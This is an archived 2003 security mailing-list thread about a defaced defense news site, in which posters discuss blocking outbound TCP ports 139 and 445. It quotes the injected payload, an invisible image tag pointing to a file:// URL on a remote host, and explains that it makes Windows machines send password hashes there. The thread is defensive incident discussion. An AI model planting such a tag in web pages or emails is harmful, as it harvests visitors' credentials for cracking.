A host that encounters content such as <img src=file://korean_ip_address/test.jpg height=0 width=0> simply tries to contact the single host korean_ip_address. It does not try to do a DDOS. If ports 139 and 445 are not blocked outbound, the impact is that the host will create a connection with the Korean host and attempt to authenticate. This authentication includes providing password hashes to the remote host. What we've seen is a news site that repeatedly gets defaced. The defacement consists of simply adding the content listed above. When users are browsing the web and encounter this news site, their hosts attempt to call Korea. The packets all have the same destination IP address (the Korean host) and their only intent is to establish a connection with the Korean host. There is no intent to do a DOS. So, blocking outbound TCP 139 and 445 keeps your password hashes from being transmitted to Korea where they might be cracked and used for gaining access to your network. The content simply provides a way to harvest password hashes. By the way, I've also seen this content in an e-mail message. Yes, when the user opened the e-mail, his host started attempting to contact the IP address listed in the offending content. Vern -----Original Message----- From: Jack Lyons [mailto:jack.lyonsat_private] Sent: Tuesday, July 22, 2003 12:39 PM To: 'Stark, Vernon L.'; 'incidentsat_private' Subject: RE: Importance of outbound traffic filtering I block those ports and others outbound, but it would only stop DDOS attack against people who left those ports open inbound - correct? > -----Original Message----- > From: Stark, Vernon L. [mailto:Vern.Starkat_private] > Sent: Friday, July 18, 2003 10:13 AM > To: 'incidentsat_private' > Subject: Importance of outbound traffic filtering > > For the third time since May 5th, a site which provides news about > department of defense issues has apparently been defaced. The hack is > described in Ed Skoudis's excellent book entitled "Counter Hack" (pages > 289-290). The hack we noticed today is a web page with content of the > form > > <img src=file://korean_ip_address/test.jpg height=0 width=0> > > If outbound traffic to TCP ports 139 and 445 is NOT blocked, Windows > hosts will attempt to send password hashes to the remote host. Hosts may > attempt to contact the remote host on other ports (e.g. 80) as well. This > clearly illustrates the importance of outbound traffic filtering. > > Vern Stark, GCIA, GSEC > > JHU/APL > > -------------------------------------------------------------------------- > -- > Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the > world's premier technical IT security event! 10 tracks, 15 training > sessions, > 1,800 delegates from 30 nations including all of the top experts, from > CSO's to > "underground" security specialists. See for yourself what the buzz is > about! > Early-bird registration ends July 3. This event will sell out. > www.blackhat.com > -------------------------------------------------------------------------- > -- This email and its contents may be confidential. If it is and you are not the intended recipient, please do not disclose or use the information within this email or its attachments. If you have received this email in error, please delete it immediately. Thank you. --------------------------------------------------------------------------- ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Tue Jul 22 2003 - 13:37:01 PDT
